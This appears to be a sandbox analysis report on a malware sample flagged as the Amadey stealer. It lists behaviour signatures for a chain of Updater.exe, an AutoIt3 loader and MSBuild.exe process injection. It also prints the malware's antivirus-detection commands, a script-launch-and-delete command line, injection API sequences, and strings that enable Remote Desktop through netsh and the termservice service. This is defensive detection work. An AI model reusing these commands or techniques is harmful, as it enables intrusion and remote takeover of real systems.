Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F11EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_006F11EE
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CA2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00CA2446
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C90E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00C90E4D
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C90F9F SetUnhandledExceptionFilter, 38_2_00C90F9F
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_00C911EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042B08D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_0042B08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042A60E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_0042A60E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00445700 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_00445700
Source: C:\Users\user\AppData\Local\friend\Updater.exe Memory protected: page readonly | page read and write | page write copy | page execute | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004080D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 41_2_004080D0
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_0073230F
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_006E2D33
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073C078 SendInput,keybd_event, 35_2_0073C078
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00752E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 35_2_00752E89
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00731C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 35_2_00731C68
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00732777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 35_2_00732777
Source: Updater.exe, 0000001C.00000000.1722348560.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000495E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe, AutoIt3.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0CA4 cpuid 35_2_006F0CA4
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_014A19D5
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A22F9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A6959
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A69A5
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_014A1ADF
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA,GetACP, 35_2_014A7EF1
Source: C:\edgheaa\AutoIt3.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 38_2_0165126D
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_016561F1
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_0165623D
Source: C:\edgheaa\AutoIt3.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 38_2_01651377
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA,GetACP, 38_2_01657789
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_01651B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_0044F013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_004585E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_00458597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_0045867D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 41_2_00458708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_0045895B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_0044EAF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 41_2_00458A81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_00458B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 41_2_00458C56
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00748C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 35_2_00748C58
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007159C7 GetUserNameW, 35_2_007159C7
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0070B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 35_2_0070B99F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: find.exe, 00000013.00000002.1714878841.000001BBC6920000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1714766876.000001BBC663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\edgheaa\AutoIt3.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\edgheaa\AutoIt3.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 35.2.Updater.exe.4292be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.AutoIt3.exe.44e2be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.AutoIt3.exe.4382be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.AutoIt3.exe.44e2be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.Updater.exe.4292be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.AutoIt3.exe.4382be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
OS version to string mapping found (often used in BOTs)
Source: AutoIt3.exe Binary or memory string: WIN_81
Source: AutoIt3.exe Binary or memory string: WIN_XP
Source: AutoIt3.exe Binary or memory string: WIN_XPe
Source: AutoIt3.exe Binary or memory string: WIN_VISTA
Source: AutoIt3.exe, 0000002A.00000003.2496893980.0000000004C20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AutoIt3.exe Binary or memory string: WIN_7
Source: AutoIt3.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Contains functionality to start a terminal service
Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia 